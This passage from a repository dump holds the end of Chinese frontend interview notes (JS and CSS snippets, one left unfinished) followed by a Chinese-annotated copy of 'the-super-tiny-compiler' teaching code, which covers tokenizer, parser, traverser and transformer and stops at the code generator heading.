651 |   let length = intArr.length
652 |   for(let i = 0; i < intArr.length; i++){
653 |     if((i + 1) %  3 === 0){
654 |       result =  `,${intArr[length - i -1]}${result}`
655 |     }else{
656 |       result = `${intArr[length - i -1]}${result}`
657 |     }
658 |   }
659 |   result = result.replace(/^,/, '')
660 |   return result
661 |   
662 | }
663 | ```
664 | 
665 | ```jsx
666 | // 有一个全局变量 a，有一个全局函数 b，实现一个方法bindData，执行后，a的任何赋值都会触发b的执行。
667 | var a = 1;
668 | function b(){
669 | 	console.log('a的值发生改变');
670 | }
671 | bindData();
672 | a = 2; // 此时输出 a的值发生改变
673 | 
674 | function bindData(){
675 |   Object.defineProperty(a,)
676 | }
677 | ```
678 | 
679 | ## 数组去重
680 | 
681 | ```jsx
682 | function distinct(arr){
683 |   let rst = []
684 |   for(let i = 0; i < arr.length; i++){
685 |     if(rst.indexOf(arr[i]) < 0){
686 |       rst.push(arr[i])
687 |     }
688 |   }
689 |   return rst
690 | }
691 | ```
692 | 
693 | ## transition: <property> <duration> <timing-function> <delay>;
694 | 
695 | ## animation:  name fill-mode timing-function delay iteration-count direction  nameduration  play-state
696 | 
697 | ## transform: rotate  scale skew translate matrix
698 | 
699 | ## 右边宽度固定，左边自适应
700 | 
701 | 1. 用flex
702 | ```css
703 | .flex{
704 |   display: flex;
705 | }
706 | .right{
707 |   flex-grow: 0;
708 |   width: 10px;
709 | }
710 | ```
711 | 
712 | 2. padding
713 | ## this绑定的优先级
714 | 
715 | 全局 < obj.fn()< obj.call/obj.call/fn.bind < () => {}  < new 
716 | 
717 | 


--------------------------------------------------------------------------------
/the-super-tiny-compiler.js:
--------------------------------------------------------------------------------
  1 | 'use strict';
  2 | 
  3 | /**
  4 |  * TTTTTTTTTTTTTTTTTTTTTTTHHHHHHHHH     HHHHHHHHHEEEEEEEEEEEEEEEEEEEEEE
  5 |  * T:::::::::::::::::::::TH:::::::H     H:::::::HE::::::::::::::::::::E
  6 |  * T:::::::::::::::::::::TH:::::::H     H:::::::HE::::::::::::::::::::E
  7 |  * T:::::TT:::::::TT:::::THH::::::H     H::::::HHEE::::::EEEEEEEEE::::E
  8 |  * TTTTTT  T:::::T  TTTTTT  H:::::H     H:::::H    E:::::E       EEEEEE
  9 |  *         T:::::T          H:::::H     H:::::H    E:::::E
 10 |  *         T:::::T          H::::::HHHHH::::::H    E::::::EEEEEEEEEE
 11 |  *         T:::::T          H:::::::::::::::::H    E:::::::::::::::E
 12 |  *         T:::::T          H:::::::::::::::::H    E:::::::::::::::E
 13 |  *         T:::::T          H::::::HHHHH::::::H    E::::::EEEEEEEEEE
 14 |  *         T:::::T          H:::::H     H:::::H    E:::::E
 15 |  *         T:::::T          H:::::H     H:::::H    E:::::E       EEEEEE
 16 |  *       TT:::::::TT      HH::::::H     H::::::HHEE::::::EEEEEEEE:::::E
 17 |  *       T:::::::::T      H:::::::H     H:::::::HE::::::::::::::::::::E
 18 |  *       T:::::::::T      H:::::::H     H:::::::HE::::::::::::::::::::E
 19 |  *       TTTTTTTTTTT      HHHHHHHHH     HHHHHHHHHEEEEEEEEEEEEEEEEEEEEEE
 20 |  *
 21 |  *    SSSSSSSSSSSSSSS UUUUUUUU     UUUUUUUUPPPPPPPPPPPPPPPPP   EEEEEEEEEEEEEEEEEEEEEERRRRRRRRRRRRRRRRR
 22 |  *  SS:::::::::::::::SU::::::U     U::::::UP::::::::::::::::P  E::::::::::::::::::::ER::::::::::::::::R
 23 |  * S:::::SSSSSS::::::SU::::::U     U::::::UP::::::PPPPPP:::::P E::::::::::::::::::::ER::::::RRRRRR:::::R
 24 |  * S:::::S     SSSSSSSUU:::::U     U:::::UUPP:::::P     P:::::PEE::::::EEEEEEEEE::::ERR:::::R     R:::::R
 25 |  * S:::::S             U:::::U     U:::::U   P::::P     P:::::P  E:::::E       EEEEEE  R::::R     R:::::R
 26 |  * S:::::S             U:::::U     U:::::U   P::::P     P:::::P  E:::::E               R::::R     R:::::R
 27 |  *  S::::SSSS          U:::::U     U:::::U   P::::PPPPPP:::::P   E::::::EEEEEEEEEE     R::::RRRRRR:::::R
 28 |  *   SS::::::SSSSS     U:::::U     U:::::U   P:::::::::::::PP    E:::::::::::::::E     R:::::::::::::RR
 29 |  *     SSS::::::::SS   U:::::U     U:::::U   P::::PPPPPPPPP      E:::::::::::::::E     R::::RRRRRR:::::R
 30 |  *        SSSSSS::::S  U:::::U     U:::::U   P::::P              E::::::EEEEEEEEEE     R::::R     R:::::R
 31 |  *             S:::::S U:::::U     U:::::U   P::::P              E:::::E               R::::R     R:::::R
 32 |  *             S:::::S U::::::U   U::::::U   P::::P              E:::::E       EEEEEE  R::::R     R:::::R
 33 |  * SSSSSSS     S:::::S U:::::::UUU:::::::U PP::::::PP          EE::::::EEEEEEEE:::::ERR:::::R     R:::::R
 34 |  * S::::::SSSSSS:::::S  UU:::::::::::::UU  P::::::::P          E::::::::::::::::::::ER::::::R     R:::::R
 35 |  * S:::::::::::::::SS     UU:::::::::UU    P::::::::P          E::::::::::::::::::::ER::::::R     R:::::R
 36 |  *  SSSSSSSSSSSSSSS         UUUUUUUUU      PPPPPPPPPP          EEEEEEEEEEEEEEEEEEEEEERRRRRRRR     RRRRRRR
 37 |  *
 38 |  * TTTTTTTTTTTTTTTTTTTTTTTIIIIIIIIIINNNNNNNN        NNNNNNNNYYYYYYY       YYYYYYY
 39 |  * T:::::::::::::::::::::TI::::::::IN:::::::N       N::::::NY:::::Y       Y:::::Y
 40 |  * T:::::::::::::::::::::TI::::::::IN::::::::N      N::::::NY:::::Y       Y:::::Y
 41 |  * T:::::TT:::::::TT:::::TII::::::IIN:::::::::N     N::::::NY::::::Y     Y::::::Y
 42 |  * TTTTTT  T:::::T  TTTTTT  I::::I  N::::::::::N    N::::::NYYY:::::Y   Y:::::YYY
 43 |  *         T:::::T          I::::I  N:::::::::::N   N::::::N   Y:::::Y Y:::::Y
 44 |  *         T:::::T          I::::I  N:::::::N::::N  N::::::N    Y:::::Y:::::Y
 45 |  *         T:::::T          I::::I  N::::::N N::::N N::::::N     Y:::::::::Y
 46 |  *         T:::::T          I::::I  N::::::N  N::::N:::::::N      Y:::::::Y
 47 |  *         T:::::T          I::::I  N::::::N   N:::::::::::N       Y:::::Y
 48 |  *         T:::::T          I::::I  N::::::N    N::::::::::N       Y:::::Y
 49 |  *         T:::::T          I::::I  N::::::N     N:::::::::N       Y:::::Y
 50 |  *       TT:::::::TT      II::::::IIN::::::N      N::::::::N       Y:::::Y
 51 |  *       T:::::::::T      I::::::::IN::::::N       N:::::::N    YYYY:::::YYYY
 52 |  *       T:::::::::T      I::::::::IN::::::N        N::::::N    Y:::::::::::Y
 53 |  *       TTTTTTTTTTT      IIIIIIIIIINNNNNNNN         NNNNNNN    YYYYYYYYYYYYY
 54 |  *
 55 |  *         CCCCCCCCCCCCC     OOOOOOOOO     MMMMMMMM               MMMMMMMMPPPPPPPPPPPPPPPPP   IIIIIIIIIILLLLLLLLLLL             EEEEEEEEEEEEEEEEEEEEEERRRRRRRRRRRRRRRRR
 56 |  *      CCC::::::::::::C   OO:::::::::OO   M:::::::M             M:::::::MP::::::::::::::::P  I::::::::IL:::::::::L             E::::::::::::::::::::ER::::::::::::::::R
 57 |  *    CC:::::::::::::::C OO:::::::::::::OO M::::::::M           M::::::::MP::::::PPPPPP:::::P I::::::::IL:::::::::L             E::::::::::::::::::::ER::::::RRRRRR:::::R
 58 |  *   C:::::CCCCCCCC::::CO:::::::OOO:::::::OM:::::::::M         M:::::::::MPP:::::P     P:::::PII::::::IILL:::::::LL             EE::::::EEEEEEEEE::::ERR:::::R     R:::::R
 59 |  *  C:::::C       CCCCCCO::::::O   O::::::OM::::::::::M       M::::::::::M  P::::P     P:::::P  I::::I    L:::::L                 E:::::E       EEEEEE  R::::R     R:::::R
 60 |  * C:::::C              O:::::O     O:::::OM:::::::::::M     M:::::::::::M  P::::P     P:::::P  I::::I    L:::::L                 E:::::E               R::::R     R:::::R
 61 |  * C:::::C              O:::::O     O:::::OM:::::::M::::M   M::::M:::::::M  P::::PPPPPP:::::P   I::::I    L:::::L                 E::::::EEEEEEEEEE     R::::RRRRRR:::::R
 62 |  * C:::::C              O:::::O     O:::::OM::::::M M::::M M::::M M::::::M  P:::::::::::::PP    I::::I    L:::::L                 E:::::::::::::::E     R:::::::::::::RR
 63 |  * C:::::C              O:::::O     O:::::OM::::::M  M::::M::::M  M::::::M  P::::PPPPPPPPP      I::::I    L:::::L                 E:::::::::::::::E     R::::RRRRRR:::::R
 64 |  * C:::::C              O:::::O     O:::::OM::::::M   M:::::::M   M::::::M  P::::P              I::::I    L:::::L                 E::::::EEEEEEEEEE     R::::R     R:::::R
 65 |  * C:::::C              O:::::O     O:::::OM::::::M    M:::::M    M::::::M  P::::P              I::::I    L:::::L                 E:::::E               R::::R     R:::::R
 66 |  *  C:::::C       CCCCCCO::::::O   O::::::OM::::::M     MMMMM     M::::::M  P::::P              I::::I    L:::::L         LLLLLL  E:::::E       EEEEEE  R::::R     R:::::R
 67 |  *   C:::::CCCCCCCC::::CO:::::::OOO:::::::OM::::::M               M::::::MPP::::::PP          II::::::IILL:::::::LLLLLLLLL:::::LEE::::::EEEEEEEE:::::ERR:::::R     R:::::R
 68 |  *    CC:::::::::::::::C OO:::::::::::::OO M::::::M               M::::::MP::::::::P          I::::::::IL::::::::::::::::::::::LE::::::::::::::::::::ER::::::R     R:::::R
 69 |  *      CCC::::::::::::C   OO:::::::::OO   M::::::M               M::::::MP::::::::P          I::::::::IL::::::::::::::::::::::LE::::::::::::::::::::ER::::::R     R:::::R
 70 |  *         CCCCCCCCCCCCC     OOOOOOOOO     MMMMMMMM               MMMMMMMMPPPPPPPPPP          IIIIIIIIIILLLLLLLLLLLLLLLLLLLLLLLLEEEEEEEEEEEEEEEEEEEEEERRRRRRRR     RRRRRRR
 71 |  *
 72 |  * =======================================================================================================================================================================
 73 |  * =======================================================================================================================================================================
 74 |  * =======================================================================================================================================================================
 75 |  * =======================================================================================================================================================================
 76 |  */
 77 | 
 78 | /**
 79 |  * 今天我们将一起来写一个编译器。但这并不是一个普通的编译器...而是一个非常非常非常小的编译器。
 80 |  * 小到什么成都呢？如果你把这个文件里的注释删掉，它将只剩下200行不到。
 81 |  * 
 82 |  * 我们将会把一些用lisp语法编写的函数，转化为符合c语言语法的函数。
 83 |  * 
 84 |  * 如果你并不熟悉这两种语法，我会给你一个简单的介绍。
 85 |  *
 86 |  * 如果我们有两个函数，可用于相加和相减，那么它们将会是这样的。
 87 |  *
 88 |  *                  LISP                      C
 89 |  *
 90 |  *   2 + 2          (add 2 2)                 add(2, 2)
 91 |  *   4 - 2          (subtract 4 2)            subtract(4, 2)
 92 |  *   2 + (4 - 2)    (add 2 (subtract 4 2))    add(2, subtract(4, 2))
 93 |  *
 94 |  * 很简单吧？
 95 |  * 
 96 |  * 非常好，因为这正是我们所要编译的。尽管这并不是完整的lisp语法或者c语法，但这已经足够
 97 |  * 用于理解当下主流的编译器的原理了。
 98 |  */
 99 | 
100 | /**
101 |  * 大多数编译器可以分解为三个步骤：解析，转化，生成。
102 |  * 
103 |  * 1.解析：将代码字符串解析成抽象语法树
104 |  * 
105 |  * 2.变换：转换抽象语法树
106 |  * 
107 |  * 3.生成：根据变换后的抽象语法树再生成代码字符串
108 |  */
109 | 
110 | /**
111 |  * 解析
112 |  * -------
113 |  *
114 |  * 解析可以分解为两个步骤：词汇分析、语法分析
115 |  * 
116 |  * 1. 词汇分析：通过一个词法分析器（tokenizer），原始的代码可以被分解进tokens
117 |  * 
118 |  *    Tokens是一个数组，里面有各种描述语法特征的小对象。它们可以是数字，标签，标点符号，
119 |  *    运算符或者其他任何东西。
120 |  *
121 |  * 2. 语法分析：接受tokens，并将它们转化为一种可以描述语法和相互之间的关系的呈现方式。
122 |  *    这通常被称为中间表达或者抽象语法树（AST）。
123 |  *
124 |  *    抽象语法树，是一个嵌套很深的对象，这是一种比较容易呈现代码的方式，并且能告诉我们很多
125 |  *    信息。
126 |  * 
127 |  * 转换下面这样的语法：
128 |  *
129 |  *   (add 2 (subtract 4 2))
130 |  *
131 |  * Tokens 会是如此:
132 |  *
133 |  *   [
134 |  *     { type: 'paren',  value: '('        },
135 |  *     { type: 'name',   value: 'add'      },
136 |  *     { type: 'number', value: '2'        },
137 |  *     { type: 'paren',  value: '('        },
138 |  *     { type: 'name',   value: 'subtract' },
139 |  *     { type: 'number', value: '4'        },
140 |  *     { type: 'number', value: '2'        },
141 |  *     { type: 'paren',  value: ')'        },
142 |  *     { type: 'paren',  value: ')'        },
143 |  *   ]
144 |  *
145 |  * 抽象语法树会是如此：
146 |  *
147 |  *   {
148 |  *     type: 'Program',
149 |  *     body: [{
150 |  *       type: 'CallExpression',
151 |  *       name: 'add',
152 |  *       params: [{
153 |  *         type: 'NumberLiteral',
154 |  *         value: '2',
155 |  *       }, {
156 |  *         type: 'CallExpression',
157 |  *         name: 'subtract',
158 |  *         params: [{
159 |  *           type: 'NumberLiteral',
160 |  *           value: '4',
161 |  *         }, {
162 |  *           type: 'NumberLiteral',
163 |  *           value: '2',
164 |  *         }]
165 |  *       }]
166 |  *     }]
167 |  *   }
168 |  */
169 | 
170 | /**
171 |  * 转化
172 |  * --------------
173 |  *
174 |  * 编译器的下一步将会是转化。它只是把AST从最近的步骤那边拿过来，然后做了一些修改。
175 |  * 它可以在同语言基础上修改AST，也可以将AST转化为一种全新的语言。
176 |  * 
177 |  * 让我们来看下如何转化一个AST
178 |  *
179 |  * 或许你已经注意到了，我们的AST只有一个元素，这使得它显得非常简单。这里有几个对象，各自
180 |  * 有不同的属性。它们每一个都是一个AST节点。这些节点上有一些定义了属性，用于描述树上某一
181 |  * 个独立的部分。
182 |  *
183 |  * 这里有一个数字节点
184 |  *
185 |  *   {
186 |  *     type: 'NumberLiteral',
187 |  *     value: '2',
188 |  *   }
189 |  *
190 |  * 这里有一个函数节点
191 |  *
192 |  *   {
193 |  *     type: 'CallExpression',
194 |  *     name: 'subtract',
195 |  *     params: [...nested nodes go here...],
196 |  *   }
197 |  *
198 |  * 当转换AST时，我们通过新增/移除/替换的方式，可以添加新的节点，移除节点，或者我们可以
199 |  * 旧的AST不管，直接生成一个全新的AST.
200 |  *
201 |  * 因为我们的目标是新的语言，所以我们将会生成一个针该改语言的全新的AST。
202 |  *
203 |  * 遍历
204 |  * ---------
205 |  *
206 |  * 为了处理所有的节点，我们需要遍历它们。遍历会优先深度。
207 |  *
208 |  *   {
209 |  *     type: 'Program',
210 |  *     body: [{
211 |  *       type: 'CallExpression',
212 |  *       name: 'add',
213 |  *       params: [{
214 |  *         type: 'NumberLiteral',
215 |  *         value: '2'
216 |  *       }, {
217 |  *         type: 'CallExpression',
218 |  *         name: 'subtract',
219 |  *         params: [{
220 |  *           type: 'NumberLiteral',
221 |  *           value: '4'
222 |  *         }, {
223 |  *           type: 'NumberLiteral',
224 |  *           value: '2'
225 |  *         }]
226 |  *       }]
227 |  *     }]
228 |  *   }
229 |  *
230 |  * 对于上面的节点树：
231 |  *
232 |  *   1. Program - 从AST的顶部开始
233 |  *   2. CallExpression (add) -到了Program的第一个节点
234 |  *   3. NumberLiteral (2) - 到了CallExpression的第一个参数
235 |  *   4. CallExpression (subtract) - 到了CallExpression的第二个参数
236 |  *   5. NumberLiteral (4) - 到了CallExpression的第一个参数
237 |  *   6. NumberLiteral (2) - 到了CallExpression的第二个参数
238 |  *
239 |  * 如果我们直接操作AST,而不是创建一个独立的AST,我们可能会介绍所有种类的抽象，但是目前
240 |  * 访问所有节点的方法已经够用了。
241 |  *
242 |  * 之所以我要使用“访问”这个词，是因为这里有一种模式，它展示如何去操作对象结构
243 |  * The reason I use the word "visiting" is because there is this pattern of how
244 |  * to represent operations on elements of an object structure.
245 |  *
246 |  * Visitors
247 |  * --------
248 |  *
249 |  * 最基本的想法是，创建一个visitor对象，它有一些方法可以用来接受不同的节点类型。
250 |  *
251 |  *   var visitor = {
252 |  *     NumberLiteral() {},
253 |  *     CallExpression() {},
254 |  *   };
255 |  *
256 |  * 遍历AST时，我们将会调用visitor的这些方法去处理对应的节点类型。
257 |  * When we traverse our AST, we will call the methods on this visitor whenever we
258 |  * "enter" a node of a matching type.
259 |  *
260 |  * 为了更好用，我们会传入节点和父节点的引用。
261 |  *
262 |  *   var visitor = {
263 |  *     NumberLiteral(node, parent) {},
264 |  *     CallExpression(node, parent) {},
265 |  *   };
266 |  *
267 |  * 但是，依旧存在一种可能性--在退出时调用函数。想象一下，我们之前的树结构转化列表的形式：
268 |  *
269 |  *   - Program
270 |  *     - CallExpression
271 |  *       - NumberLiteral
272 |  *       - CallExpression
273 |  *         - NumberLiteral
274 |  *         - NumberLiteral
275 |  *
276 |  * 向下遍历时，我们会到达一些分支的尽头。当到达一些分支的尽头时，我们将退出。所以向
277 |  * 下走，我们进入节点，往回走我们会退出。
278 |  *
279 |  *   -> Program (enter)
280 |  *     -> CallExpression (enter)
281 |  *       -> Number Literal (enter)
282 |  *       <- Number Literal (exit)
283 |  *       -> Call Expression (enter)
284 |  *          -> Number Literal (enter)
285 |  *          <- Number Literal (exit)
286 |  *          -> Number Literal (enter)
287 |  *          <- Number Literal (exit)
288 |  *       <- CallExpression (exit)
289 |  *     <- CallExpression (exit)
290 |  *   <- Program (exit)
291 |  *
292 |  * 为了支持这种方式，最终的visitor会是这样的：
293 |  *
294 |  *   var visitor = {
295 |  *     NumberLiteral: {
296 |  *       enter(node, parent) {},
297 |  *       exit(node, parent) {},
298 |  *     }
299 |  *   };
300 |  */
301 | 
302 | /**
303 |  * 代码生成
304 |  * ---------------
305 |  *
306 |  * 编译器的最后一个阶段是生成代码。有时候编译器会做些和转化阶段重复的事情，但是大多数的
307 |  * 代码生成还是在AST阶段的。
308 |  *
309 |  * 代码生成步骤用好几种实现方式，有一些编译器会重复利用之前的tokens，其它的则会生成
310 |  * 一套独立的代码表达方式，从而它们能够线性生成代码，但是我能确定的是，大多数会使用
311 |  * 我们刚刚生成的AST，这也是我们接下来要用到的。
312 |  *
313 |  * 我们的代码生成器会有效的知道如何“打印”各种不同类型的AST节点，并且它会递归调用自己去
314 |  * 打印嵌套的节点，知道所有的代码被打印成一串很长的字符串。
315 |  */
316 | 
317 | /**
318 |  * 这就是它了！那已经是编译器里面所有的不同点了。
319 |  *
320 |  * 现在还不能说所有的编译器的工作原理就像是我所描述的这样。
321 |  * 编译器有很多的目的，因此相比于我所描述的，它们可能需要更多的步骤。
322 |  *
323 |  * 但是你现在应该对大多数的编译器的架构有了一个大致的了解。
324 |  *
325 |  * 既然我已经介绍了这么多了，你已经做好准备去编写一个属于你自己的编译器了吗？
326 |  *
327 |  * 哈哈，只是开玩笑，接下来让我们一起来解析下方编译器的源码 :P
328 |  *
329 |  * 准备开始吧...
330 |  */
331 | 
332 | /**
333 |  * ============================================================================
334 |  *                                   (/^▽^)/
335 |  *                                THE TOKENIZER!
336 |  * ============================================================================
337 |  */
338 | 
339 | /**
340 |  * 首先开始的是词汇分析，这一步骤我们将借助tokenizer
341 |  *
342 |  * 我们将会接受代码字符串，并将它们分解为token数组
343 |  *
344 |  *   (add 2 (subtract 4 2))   =>   [{ type: 'paren', value: '(' }, ...]
345 |  */
346 | // 从接受一段代码字符串开始，我们先先做两件事
347 | function tokenizer(input) {
348 | 
349 |   // 'current'变量用于定位位置
350 |   let current = 0;
351 | 
352 |   // `tokens`数组用于保存token
353 |   let tokens = [];
354 | 
355 |   // 遍历字符串
356 |   while (current < input.length) {
357 | 
358 |     // 获取字符
359 |     let char = input[current];
360 | 
361 |     // 检查圆括号
362 |     if (char === '(') {
363 |       tokens.push({
364 |         type: 'paren',
365 |         value: '(',
366 |       });
367 |       current++;
368 |       continue;
369 |     }
370 | 
371 |     if (char === ')') {
372 |       tokens.push({
373 |         type: 'paren',
374 |         value: ')',
375 |       });
376 |       current++;
377 |       continue;
378 |     }
379 | 
380 |     // 空格无关紧要
381 |     let WHITESPACE = /\s/;
382 |     if (WHITESPACE.test(char)) {
383 |       current++;
384 |       continue;
385 |     }
386 | 
387 |     // 接下来是数组。这里有些不一样，因为我们希望能获取整串数字作为一个token。如下所示
388 |     //
389 |     //   (add 123 456)
390 |     //        ^^^ ^^^
391 |     //        这里应该只有两个token
392 |     //
393 |     let NUMBERS = /[0-9]/;
394 |     if (NUMBERS.test(char)) {
395 | 
396 |       let value = '';
397 | 
398 |       while (NUMBERS.test(char)) {
399 |         value += char;
400 |         char = input[++current];
401 |       }
402 | 
403 |       tokens.push({ type: 'number', value });
404 |       continue;
405 |     }
406 | 
407 |     // 字符串同上
408 |     //
409 |     //   (concat "foo" "bar")
410 |     //            ^^^   ^^^ string tokens
411 |     if (char === '"') {
412 |       let value = '';
413 | 
414 |       char = input[++current];
415 |       while (char !== '"') {
416 |         value += char;
417 |         char = input[++current];
418 |       }
419 |       char = input[++current];
420 |       tokens.push({ type: 'string', value });
421 | 
422 |       continue;
423 |     }
424 | 
425 |     // 变量或关键字，同上
426 |     //
427 |     //   (add 2 4)
428 |     //    ^^^
429 |     //    Name token
430 |     let LETTERS = /[a-z]/i;
431 |     if (LETTERS.test(char)) {
432 |       let value = '';
433 |       while (LETTERS.test(char)) {
434 |         value += char;
435 |         char = input[++current];
436 |       }
437 |       tokens.push({ type: 'name', value });
438 | 
439 |       continue;
440 |     }
441 |     throw new TypeError('I dont know what this character is: ' + char);
442 |   }
443 |   return tokens;
444 | }
445 | 
446 | /**
447 |  * ============================================================================
448 |  *                                 ヽ/❀o ل͜ o\ﾉ
449 |  *                                THE PARSER!!!
450 |  * ============================================================================
451 |  */
452 | 
453 | /**
454 |  * 接下来我们会把tokens数组转化为AST对象
455 |  *
456 |  *   [{ type: 'paren', value: '(' }, ...]   =>   { type: 'Program', body: [...] }
457 |  */
458 | function parser(tokens) {
459 |   let current = 0;
460 | 
461 |   // walk是一个递归函数
462 |   function walk() {
463 | 
464 |     // 获取当前token
465 |     let token = tokens[current];
466 | 
467 |     // 数字类型
468 |     if (token.type === 'number') {
469 |       current++;
470 |       return {
471 |         type: 'NumberLiteral',
472 |         value: token.value,
473 |       };
474 |     }
475 | 
476 |     // 字符串类型
477 |     if (token.type === 'string') {
478 |       current++;
479 | 
480 |       return {
481 |         type: 'StringLiteral',
482 |         value: token.value,
483 |       };
484 |     }
485 | 
486 |     if (
487 |       token.type === 'paren' &&
488 |       token.value === '('
489 |     ) {
490 |       token = tokens[++current];
491 |       let node = {
492 |         type: 'CallExpression',
493 |         name: token.value,
494 |         params: [],
495 |       };
496 |       token = tokens[++current];
497 | 
498 |       // 递归，找到函数的所有作为函数参数的token，以下面这个函数为例
499 |       //
500 |       //   (add 2 (subtract 4 2))
501 |       //
502 |       // 在tokens数组中会遇到多个闭合圆括号
503 |       //
504 |       //   [
505 |       //     { type: 'paren',  value: '('        },
506 |       //     { type: 'name',   value: 'add'      },
507 |       //     { type: 'number', value: '2'        },
508 |       //     { type: 'paren',  value: '('        },
509 |       //     { type: 'name',   value: 'subtract' },
510 |       //     { type: 'number', value: '4'        },
511 |       //     { type: 'number', value: '2'        },
512 |       //     { type: 'paren',  value: ')'        }, <<< Closing parenthesis
513 |       //     { type: 'paren',  value: ')'        }, <<< Closing parenthesis
514 |       //   ]
515 |       //
516 |       // 递归walk，知道遇到闭合圆括号才跳出walk
517 | 
518 |       while (
519 |         (token.type !== 'paren') ||
520 |         (token.type === 'paren' && token.value !== ')')
521 |       ) {
522 |         // walk返回值为函数的参数节点
523 |         node.params.push(walk());
524 |         token = tokens[current];
525 |       }
526 |       current++;
527 |       return node;
528 |     }
529 | 
530 |     //没有找到匹配类型，报错
531 |     throw new TypeError(token.type);
532 |   }
533 | 
534 |   // 拥有program顶节点的AST
535 |   let ast = {
536 |     type: 'Program',
537 |     body: [],
538 |   };
539 | 
540 |   // 触发walk
541 |   //
542 |   // 这样是因为函数可能是平级的，并不是嵌套关系，如下所示
543 |   //
544 |   //   (add 2 2)
545 |   //   (subtract 4 2)
546 |   //
547 |   while (current < tokens.length) {
548 |     ast.body.push(walk());
549 |   }
550 | 
551 |   return ast;
552 | }
553 | 
554 | /**
555 |  * ============================================================================
556 |  *                                 ⌒(❀>◞౪◟<❀)⌒
557 |  *                                      转换器!!!
558 |  * ============================================================================
559 |  */
560 | 
561 | /**
562 |  * 遍历抽象语法树(AST)时，转换对应的节点
563 |  *
564 |  *   traverse(ast, {
565 |  *     Program: {
566 |  *       enter(node, parent) {
567 |  *         // ...
568 |  *       },
569 |  *       exit(node, parent) {
570 |  *         // ...
571 |  *       },
572 |  *     },
573 |  *
574 |  *     CallExpression: {
575 |  *       enter(node, parent) {
576 |  *         // ...
577 |  *       },
578 |  *       exit(node, parent) {
579 |  *         // ...
580 |  *       },
581 |  *     },
582 |  *
583 |  *     NumberLiteral: {
584 |  *       enter(node, parent) {
585 |  *         // ...
586 |  *       },
587 |  *       exit(node, parent) {
588 |  *         // ...
589 |  *       },
590 |  *     },
591 |  *   });
592 |  */
593 | 
594 | // 定义traverser函数
595 | function traverser(ast, visitor) {
596 | 
597 |   // 用traverseNode遍历数组
598 |   function traverseArray(array, parent) {
599 |     array.forEach(child => {
600 |       traverseNode(child, parent);
601 |     });
602 |   }
603 |   // 接受两个参数，node, parent
604 |   function traverseNode(node, parent) {
605 | 
606 |     // 获得对应节点类型的方法
607 |     let methods = visitor[node.type];
608 | 
609 |     // 调用对应方法的enter
610 |     if (methods && methods.enter) {
611 |       methods.enter(node, parent);
612 |     }
613 | 
614 |     // 区分节点类型，做不同处理
615 |     switch (node.type) {
616 | 
617 |       case 'Program':
618 |         traverseArray(node.body, node);
619 |         break;
620 | 
621 |       case 'CallExpression':
622 |         traverseArray(node.params, node);
623 |         break;
624 | 
625 |       // 数字和字符串没有子节点，跳过
626 |       case 'NumberLiteral':
627 |       case 'StringLiteral':
628 |         break;
629 | 
630 |       // 没有找到对应类型，报错
631 |       default:
632 |         throw new TypeError(node.type);
633 |     }
634 | 
635 |     if (methods && methods.exit) {
636 |       methods.exit(node, parent);
637 |     }
638 |   }
639 | 
640 |   // 启动traverseNode
641 |   traverseNode(ast, null);
642 | }
643 | 
644 | /**
645 |  * ============================================================================
646 |  *                                   ⁽(◍˃̵͈̑ᴗ˂̵͈̑)⁽
647 |  *                                    转换器!!!
648 |  * ============================================================================
649 |  */
650 | 
651 | /**
652 |  * 生成一个新的AST
653 |  *
654 |  * ----------------------------------------------------------------------------
655 |  *   原始的 AST                     |   转换后的 AST
656 |  * ----------------------------------------------------------------------------
657 |  *   {                                |   {
658 |  *     type: 'Program',               |     type: 'Program',
659 |  *     body: [{                       |     body: [{
660 |  *       type: 'CallExpression',      |       type: 'ExpressionStatement',
661 |  *       name: 'add',                 |       expression: {
662 |  *       params: [{                   |         type: 'CallExpression',
663 |  *         type: 'NumberLiteral',     |         callee: {
664 |  *         value: '2'                 |           type: 'Identifier',
665 |  *       }, {                         |           name: 'add'
666 |  *         type: 'CallExpression',    |         },
667 |  *         name: 'subtract',          |         arguments: [{
668 |  *         params: [{                 |           type: 'NumberLiteral',
669 |  *           type: 'NumberLiteral',   |           value: '2'
670 |  *           value: '4'               |         }, {
671 |  *         }, {                       |           type: 'CallExpression',
672 |  *           type: 'NumberLiteral',   |           callee: {
673 |  *           value: '2'               |             type: 'Identifier',
674 |  *         }]                         |             name: 'subtract'
675 |  *       }]                           |           },
676 |  *     }]                             |           arguments: [{
677 |  *   }                                |             type: 'NumberLiteral',
678 |  *                                    |             value: '4'
679 |  * ---------------------------------- |           }, {
680 |  *                                    |             type: 'NumberLiteral',
681 |  *                                    |             value: '2'
682 |  *                                    |           }]
683 |  *  (sorry the other one is longer.)  |         }
684 |  *                                    |       }
685 |  *                                    |     }]
686 |  *                                    |   }
687 |  * ----------------------------------------------------------------------------
688 |  */
689 | 
690 | function transformer(ast) {
691 | 
692 |   let newAst = {
693 |     type: 'Program',
694 |     body: [],
695 |   };
696 | 
697 |   // 接下来我会用一些黑科技。在原来的父节点上新增一个context属性，正常情况下
698 |   // 应该会有更好的抽象方法， 但这里从简处理。
699 |   //
700 |   // 注意到context是一个新AST的引用
701 |   ast._context = newAst.body;
702 | 
703 |   traverser(ast, {
704 | 
705 |    // 数字
706 |     NumberLiteral: {
707 |       // We'll visit them on enter.
708 |       enter(node, parent) {
709 |         parent._context.push({
710 |           type: 'NumberLiteral',
711 |           value: node.value,
712 |         });
713 |       },
714 |     },
715 | 
716 |     // 字符串
717 |     StringLiteral: {
718 |       enter(node, parent) {
719 |         parent._context.push({
720 |           type: 'StringLiteral',
721 |           value: node.value,
722 |         });
723 |       },
724 |     },
725 | 
726 |     // 函数
727 |     CallExpression: {
728 |       enter(node, parent) {
729 |         let expression = {
730 |           type: 'CallExpression',
731 |           callee: {
732 |             type: 'Identifier',
733 |             name: node.name,
734 |           },
735 |           arguments: [],
736 |         };
737 | 
738 |         // 接下来，我们将在原函数节点上上定义一个context，它将指向函数参数
739 |         node._context = expression.arguments;
740 | 
741 |         // 判断父节点类型是否是函数
742 |         // 如果不是...
743 |         if (parent.type !== 'CallExpression') {
744 | 
745 |           // 用一个`ExpressionStatement`节点包装我们的`CallExpression`
746 |           // 节点。这样做是因为JavaScript最顶层，一般就是表达式。
747 |           expression = {
748 |             type: 'ExpressionStatement',
749 |             expression: expression,
750 |           };
751 |         }
752 |         parent._context.push(expression);
753 |       },
754 |     }
755 |   });
756 | 
757 |   return newAst;
758 | }
759 | 
760 | /**
761 |  * ============================================================================
762 |  *                               ヾ（〃＾∇＾）ﾉ♪
763 |  *                            THE CODE GENERATOR!!!!
764 |  * ============================================================================
765 |  */
766 | 
767 | /**
768 |  * 代码生成器
769 |  */
770 | 
